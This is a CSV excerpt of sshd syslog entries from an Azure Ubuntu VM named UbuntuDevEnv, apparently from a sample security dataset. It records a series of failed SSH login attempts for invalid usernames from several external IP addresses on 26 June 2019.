+3630,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:26,UbuntuDevEnv,2019-06-26 13:05:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3631,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:26,UbuntuDevEnv,2019-06-26 13:05:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3632,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:29,UbuntuDevEnv,2019-06-26 13:05:28,auth,UbuntuDevEnv,info,Failed password for invalid user boldwin from 194.228.3.191 port 38851 ssh2,120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,194.228.3.1,38851,,
+3633,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:29,UbuntuDevEnv,2019-06-26 13:05:28,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 38851:11: Bye Bye [preauth],120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,38851,,
+3634,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:29,UbuntuDevEnv,2019-06-26 13:05:28,auth,UbuntuDevEnv,info,Disconnected from invalid user boldwin 194.228.3.191 port 38851 [preauth],120277,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,boldwin,194.228.3.1,38851,,
+3635,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:05:44,UbuntuDevEnv,2019-06-26 13:05:43,auth,UbuntuDevEnv,info,Connection closed by 139.199.34.112 port 50202 [preauth],120325,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,50202,,
+3636,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:44,UbuntuDevEnv,2019-06-26 13:06:44,auth,UbuntuDevEnv,info,Invalid user server from 201.48.54.81 port 34301,120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,201.48.54.8,34301,,
+3637,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:44,UbuntuDevEnv,2019-06-26 13:06:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3638,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:44,UbuntuDevEnv,2019-06-26 13:06:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3639,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:46,UbuntuDevEnv,2019-06-26 13:06:45,auth,UbuntuDevEnv,info,Failed password for invalid user server from 201.48.54.81 port 34301 ssh2,120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,201.48.54.8,34301,,
+3640,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:46,UbuntuDevEnv,2019-06-26 13:06:46,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 34301:11: Bye Bye [preauth],120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,34301,,
+3641,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:46,UbuntuDevEnv,2019-06-26 13:06:46,auth,UbuntuDevEnv,info,Disconnected from invalid user server 201.48.54.81 port 34301 [preauth],120553,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,201.48.54.8,34301,,
+3642,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:58,UbuntuDevEnv,2019-06-26 13:06:57,auth,UbuntuDevEnv,info,Invalid user nc from 194.228.3.191 port 47373,120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nc,194.228.3.1,47373,,
+3643,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:58,UbuntuDevEnv,2019-06-26 13:06:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3644,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:58,UbuntuDevEnv,2019-06-26 13:06:57,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3645,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:59,UbuntuDevEnv,2019-06-26 13:06:59,auth,UbuntuDevEnv,info,Failed password for invalid user nc from 194.228.3.191 port 47373 ssh2,120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nc,194.228.3.1,47373,,
+3646,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:59,UbuntuDevEnv,2019-06-26 13:06:59,auth,UbuntuDevEnv,info,Disconnected from invalid user nc 194.228.3.191 port 47373 [preauth],120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nc,194.228.3.1,47373,,
+3647,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:06:59,UbuntuDevEnv,2019-06-26 13:06:59,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 47373:11: Bye Bye [preauth],120601,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,47373,,
+3648,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:42,UbuntuDevEnv,2019-06-26 13:07:42,auth,UbuntuDevEnv,info,Invalid user uftp from 139.199.34.112 port 37754,120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,139.199.34.1,37754,,
+3649,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:42,UbuntuDevEnv,2019-06-26 13:07:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3650,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:42,UbuntuDevEnv,2019-06-26 13:07:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3651,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:44,UbuntuDevEnv,2019-06-26 13:07:44,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 139.199.34.112 port 37754 ssh2,120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,139.199.34.1,37754,,
+3652,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:45,UbuntuDevEnv,2019-06-26 13:07:44,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 37754:11: Bye Bye [preauth],120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,37754,,
+3653,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:07:45,UbuntuDevEnv,2019-06-26 13:07:44,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 139.199.34.112 port 37754 [preauth],120758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,139.199.34.1,37754,,
+3654,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:08,UbuntuDevEnv,2019-06-26 13:10:08,auth,UbuntuDevEnv,info,Invalid user bagel from 194.228.3.191 port 36178,121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bagel,194.228.3.1,36178,,
+3655,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:08,UbuntuDevEnv,2019-06-26 13:10:08,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3656,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:08,UbuntuDevEnv,2019-06-26 13:10:08,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3657,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:10,UbuntuDevEnv,2019-06-26 13:10:10,auth,UbuntuDevEnv,info,Failed password for invalid user bagel from 194.228.3.191 port 36178 ssh2,121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bagel,194.228.3.1,36178,,
+3658,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:10,UbuntuDevEnv,2019-06-26 13:10:10,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 36178:11: Bye Bye [preauth],121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,36178,,
+3659,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:10,UbuntuDevEnv,2019-06-26 13:10:10,auth,UbuntuDevEnv,info,Disconnected from invalid user bagel 194.228.3.191 port 36178 [preauth],121290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bagel,194.228.3.1,36178,,
+3660,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:38,UbuntuDevEnv,2019-06-26 13:10:37,auth,UbuntuDevEnv,info,Invalid user glavbuh from 201.48.54.81 port 51096,121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glavbuh,201.48.54.8,51096,,
+3661,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:38,UbuntuDevEnv,2019-06-26 13:10:37,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3662,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:38,UbuntuDevEnv,2019-06-26 13:10:37,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3663,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:40,UbuntuDevEnv,2019-06-26 13:10:40,auth,UbuntuDevEnv,info,Failed password for invalid user glavbuh from 201.48.54.81 port 51096 ssh2,121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glavbuh,201.48.54.8,51096,,
+3664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:41,UbuntuDevEnv,2019-06-26 13:10:40,auth,UbuntuDevEnv,info,Disconnected from invalid user glavbuh 201.48.54.81 port 51096 [preauth],121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,glavbuh,201.48.54.8,51096,,
+3665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:10:41,UbuntuDevEnv,2019-06-26 13:10:40,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 51096:11: Bye Bye [preauth],121389,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,51096,,
+3666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:45,UbuntuDevEnv,2019-06-26 13:11:44,auth,UbuntuDevEnv,info,Invalid user bw from 194.228.3.191 port 44698,121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bw,194.228.3.1,44698,,
+3667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:45,UbuntuDevEnv,2019-06-26 13:11:45,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:45,UbuntuDevEnv,2019-06-26 13:11:45,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=194.228.3.191,121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,194.228.3.1,,0,
+3669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:47,UbuntuDevEnv,2019-06-26 13:11:47,auth,UbuntuDevEnv,info,Failed password for invalid user bw from 194.228.3.191 port 44698 ssh2,121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bw,194.228.3.1,44698,,
+3670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:47,UbuntuDevEnv,2019-06-26 13:11:47,auth,UbuntuDevEnv,info,Disconnected from invalid user bw 194.228.3.191 port 44698 [preauth],121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,bw,194.228.3.1,44698,,
+3671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:47,UbuntuDevEnv,2019-06-26 13:11:47,auth,UbuntuDevEnv,info,Received disconnect from 194.228.3.191 port 44698:11: Bye Bye [preauth],121632,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,194.228.3.1,44698,,
+3672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:53,UbuntuDevEnv,2019-06-26 13:11:52,auth,UbuntuDevEnv,info,Invalid user groupoffice from 139.199.34.112 port 41104,121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,139.199.34.1,41104,,
+3673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:53,UbuntuDevEnv,2019-06-26 13:11:52,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:53,UbuntuDevEnv,2019-06-26 13:11:52,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=139.199.34.112,121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,139.199.34.1,,0,
+3675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:55,UbuntuDevEnv,2019-06-26 13:11:54,auth,UbuntuDevEnv,info,Failed password for invalid user groupoffice from 139.199.34.112 port 41104 ssh2,121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,139.199.34.1,41104,,
+3676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:55,UbuntuDevEnv,2019-06-26 13:11:55,auth,UbuntuDevEnv,info,Disconnected from invalid user groupoffice 139.199.34.112 port 41104 [preauth],121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,groupoffice,139.199.34.1,41104,,
+3677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:11:55,UbuntuDevEnv,2019-06-26 13:11:55,auth,UbuntuDevEnv,info,Received disconnect from 139.199.34.112 port 41104:11: Bye Bye [preauth],121651,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,139.199.34.1,41104,,
+3678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:25,UbuntuDevEnv,2019-06-26 13:12:24,auth,UbuntuDevEnv,info,Invalid user ping from 157.230.115.27 port 49956,121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,157.230.115.2,49956,,
+3679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:25,UbuntuDevEnv,2019-06-26 13:12:24,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:25,UbuntuDevEnv,2019-06-26 13:12:24,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.115.27,121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,157.230.115.2,,0,
+3681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:26,UbuntuDevEnv,2019-06-26 13:12:26,auth,UbuntuDevEnv,info,Failed password for invalid user ping from 157.230.115.27 port 49956 ssh2,121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,157.230.115.2,49956,,
+3682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:26,UbuntuDevEnv,2019-06-26 13:12:26,auth,UbuntuDevEnv,info,Received disconnect from 157.230.115.27 port 49956:11: Bye Bye [preauth],121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,157.230.115.2,49956,,
+3683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:26,UbuntuDevEnv,2019-06-26 13:12:26,auth,UbuntuDevEnv,info,Disconnected from invalid user ping 157.230.115.27 port 49956 [preauth],121762,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ping,157.230.115.2,49956,,
+3684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:34,UbuntuDevEnv,2019-06-26 13:12:33,auth,UbuntuDevEnv,info,Invalid user anderson from 201.48.54.81 port 59495,121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anderson,201.48.54.8,59495,,
+3685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:34,UbuntuDevEnv,2019-06-26 13:12:33,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+3686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:34,UbuntuDevEnv,2019-06-26 13:12:33,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=201.48.54.81,121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,201.48.54.8,,0,
+3687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:36,UbuntuDevEnv,2019-06-26 13:12:35,auth,UbuntuDevEnv,info,Failed password for invalid user anderson from 201.48.54.81 port 59495 ssh2,121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anderson,201.48.54.8,59495,,
+3688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:36,UbuntuDevEnv,2019-06-26 13:12:36,auth,UbuntuDevEnv,info,Received disconnect from 201.48.54.81 port 59495:11: Bye Bye [preauth],121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,201.48.54.8,59495,,
+3689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 13:12:36,UbuntuDevEnv,2019-06-26 13:12:36,auth,UbuntuDevEnv,info,Disconnected from invalid user anderson 201.48.54.81 port 59495 [preauth],121804,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anderson,201.48.54.8,59495,,
